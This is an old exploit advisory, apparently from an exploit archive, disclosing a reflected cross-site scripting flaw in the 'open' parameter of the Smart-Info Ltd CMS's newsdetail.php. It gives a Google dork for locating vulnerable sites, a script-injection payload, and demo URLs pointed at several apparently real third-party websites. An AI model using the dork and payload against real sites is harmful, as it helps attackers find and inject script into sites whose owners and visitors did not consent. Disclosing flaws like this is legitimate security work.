Smart-Info Ltd CMS Cross Site Scripting

2012.08.31
Credit: Crim3R
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

<!-- ________ .__ __________________ \_ ___ \_______|__| _____ \_____ \______ \ / \ \/\_ __ \ |/ \ _(__ <| _/ \ \____| | \/ | Y Y \/ \ | \ \______ /|__| |__|__|_| /______ /____|_ / \/ \/ \/ \/ --> # Exploit Title: Smart-Info Ltd cms Cross site Scripting Vulnerability # # Google Dork: Intext:"Powered by Smart-Info Ltd" # # Date: 08/29/2012 # # Author: Crim3R # # Site : Http://Ajaxtm.com/ # # Vendor Home : http://www.smartinfo.com.hk/ # # Tested on: all # ================================== [+] open parametr in newsdetail.php is Vulnerable to xss [+] newsdetail.php?id=[id]&open="><script>alert(0);</script> D3m0: http://www.monitacollege.com/english/newsdetail.php?id=125&open="><script>alert(0);</script> http://www.smartinfo.com.hk/monitacollege/english/newsdetail.php?id=15&open="><script>alert(0);</script> http://demo.sXXXtinfo.cn/mornsunpower/php/newsdetail.php?id=193&open="><script>alert(0);</script> ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369

References:

http://www.smartinfo.com.hk/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top